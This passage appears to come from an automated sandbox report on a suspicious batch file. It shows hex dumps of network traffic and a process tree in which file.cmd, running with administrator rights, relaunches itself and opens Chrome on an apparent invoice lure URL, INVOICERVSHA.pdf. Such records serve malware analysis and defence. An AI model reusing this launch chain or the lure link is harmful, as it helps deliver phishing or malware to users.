                                                  2024-05-23 19:07:41 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.94972220.114.59.183443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:08:18 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BCBY8ZxyE7AZX3U&MD=h1X+NoXU HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-05-23 19:08:18 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440"
                                                  MS-CorrelationId: 266f6d4e-1e8e-42ec-97f0-8acc04aaf1d7
                                                  MS-RequestId: b9600479-ba8a-4cc7-98ce-0b2b4f203b7d
                                                  MS-CV: aUqkCyuXPkyMDkHp.0
                                                  X-Microsoft-SLSClientCache: 1440
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 23 May 2024 19:08:18 GMT
                                                  Connection: close
                                                  Content-Length: 25457
                                                  2024-05-23 19:08:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                  Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                  2024-05-23 19:08:18 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                  Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:1
                                                  Start time:15:07:22
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.cmd" "
                                                  Imagebase:0x7ff7d0650000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:15:07:22
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:15:07:22
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.cmd" MY_FLAG
                                                  Imagebase:0x7ff7d0650000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:4
                                                  Start time:15:07:22
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f010000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:6
                                                  Start time:15:07:25
                                                  Start date:23/05/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                  Imagebase:0x7ff6b2cb0000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:15:07:25
                                                  Start date:23/05/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,14738724468335102062,7754338843543299743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff6b2cb0000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  No disassembly